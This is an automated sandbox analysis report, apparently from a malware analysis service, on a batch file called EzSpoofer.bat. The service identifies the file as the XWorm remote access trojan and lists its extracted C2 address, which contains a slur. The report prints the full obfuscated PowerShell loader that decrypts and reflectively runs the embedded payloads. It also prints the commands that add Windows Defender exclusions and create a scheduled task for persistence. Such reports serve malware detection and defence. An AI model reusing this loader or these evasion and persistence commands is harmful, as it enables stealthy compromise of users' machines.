Overview

overview

10

Static

static

1

EzSpoofer.bat

windows10-ltsc 2021-x64

10

Analysis

  • max time kernel
    29s
  • max time network
    35s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250113-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    24-01-2025 14:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    EzSpoofer.bat

  • Size

    291KB

  • MD5

    9524fa679cf2b883fddf8dfe3f0c2c4f

  • SHA1

    2b20ad331b377685226e8e40d5c7364d102f0735

  • SHA256

    577c05e3a4882a69fe2a06ac772ee8742bb54c9a098a34ccdcd00da7815adc30

  • SHA512

    a38743fe6c3bf55dab74b5c04f785345a420ed23c1513ce0901f1f78e28f277c8c49cad809c909a2bb0cb9e16d98ce88dd92a241e11f4ab4e128728077b3c42d

  • SSDEEP

    6144:yUkjDHOfsQkBWTAaCi+oG7RZAkehxo4CzC1a5TAl2K9:yvPuE3BIQTEjPv5

Score
10/10
xwormexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

C2

IDKTOBEHONESTNIGAS-56344.portmap.io:56344

Attributes
  • Install_directory

    %ProgramData%

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 13 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

    execution
  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EzSpoofer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3620
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0V3kVtJZ/RnJS/1KnDl9kRNJa4hjwKb/wS09GjV1yoI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PWhCalcBIWTHvOEwx/NKyQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $oWlOe=New-Object System.IO.MemoryStream(,$param_var); $tikAk=New-Object System.IO.MemoryStream; $hdfbY=New-Object System.IO.Compression.GZipStream($oWlOe, [IO.Compression.CompressionMode]::Decompress); $hdfbY.CopyTo($tikAk); $hdfbY.Dispose(); $oWlOe.Dispose(); $tikAk.Dispose(); $tikAk.ToArray();}function execute_function($param_var,$param2_var){ $HCNpH=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $IoHdh=$HCNpH.EntryPoint; $IoHdh.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\EzSpoofer.bat';$fQNIN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\EzSpoofer.bat').Split([Environment]::NewLine);foreach ($SSNIA in $fQNIN) { if ($SSNIA.StartsWith(':: ')) { $dFMGe=$SSNIA.Substring(3); break; }}$payloads_var=[string[]]$dFMGe.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Drops startup file
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4636
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2256
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2028
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\powershell.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2600
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "powershell" /tr "C:\ProgramData\powershell.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:3472
  • C:\ProgramData\powershell.exe
    "C:\ProgramData\powershell.exe"
    1⤵
    • Executes dropped EXE
    • Suspicious behavior: EnumeratesProcesses
    PID:3032

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\powershell.exe
    Filesize

    445KB

    MD5

    2e5a8590cf6848968fc23de3fa1e25f1

    SHA1

    801262e122db6a2e758962896f260b55bbd0136a

    SHA256

    9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3

    SHA512

    5c5ca5a497f39b07c7599194512a112b05bba8d9777bee1cb45bf610483edbffff5f9132fee3673e46cf58f2c3ba21af7df13c273a837a565323b82a7b50a4d8

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    3eb3833f769dd890afc295b977eab4b4

    SHA1

    e857649b037939602c72ad003e5d3698695f436f

    SHA256

    c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

    SHA512

    c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    26c94c408a5a2e1e04f1191fc2902d3e

    SHA1

    ce50b153be03511bd62a477abf71a7e9f94e68a5

    SHA256

    86ad00a425874b935cc725f83780add09d08d7dc9cbfb705821955fe937c05ec

    SHA512

    70e7bc620b369d7d0fcf06f93da000819bf089a502f1014641ad14d56ead22f31c25b97363296fd3749c63bde6db3bf115b33504b160485d792e1331c337b586

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    a1bafdfa6ee8d81727db67fc12d9e3f2

    SHA1

    c22129ce21faba480196334c9a7d7b2c967b0729

    SHA256

    aeadfd69f302dac8ff81f9d4ea10499d7a80c72cc3cfab04624d612e0c75aacb

    SHA512

    b7bd1203032ccab2cee0296fe17e15517bbd2e09ec7fb3c357fe46e370f6fd20b7028cf2154fd08358ab15fff0120b7d7f7149c6ada312f0d65d2ea23405487b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4m42dfae.1gw.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/2256-29-0x00007FFD61FF0000-0x00007FFD62AB2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2256-32-0x00007FFD61FF0000-0x00007FFD62AB2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2256-17-0x00007FFD61FF0000-0x00007FFD62AB2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2256-27-0x00007FFD61FF0000-0x00007FFD62AB2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2256-28-0x00007FFD61FF0000-0x00007FFD62AB2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2256-35-0x00007FFD61FF0000-0x00007FFD62AB2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3032-78-0x0000022A3BE20000-0x0000022A3BE96000-memory.dmp

    Filesize

    472KB

    Download

  • memory/3032-77-0x0000022A3BD50000-0x0000022A3BD94000-memory.dmp

    Filesize

    272KB

    Download

  • memory/4636-31-0x00007FFD61FF3000-0x00007FFD61FF5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4636-14-0x000002A01D500000-0x000002A01D508000-memory.dmp

    Filesize

    32KB

    Download

  • memory/4636-30-0x00007FFD61FF0000-0x00007FFD62AB2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4636-0-0x00007FFD61FF3000-0x00007FFD61FF5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4636-13-0x00007FFD61FF0000-0x00007FFD62AB2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4636-12-0x00007FFD61FF0000-0x00007FFD62AB2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4636-11-0x00007FFD61FF0000-0x00007FFD62AB2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4636-6-0x000002A01D520000-0x000002A01D542000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4636-16-0x000002A01D7B0000-0x000002A01D7C8000-memory.dmp

    Filesize

    96KB

    Download

  • memory/4636-15-0x000002A01D770000-0x000002A01D7A8000-memory.dmp

    Filesize

    224KB

    Download

  • memory/4636-79-0x000002A01DB60000-0x000002A01DB6C000-memory.dmp

    Filesize

    48KB

    Download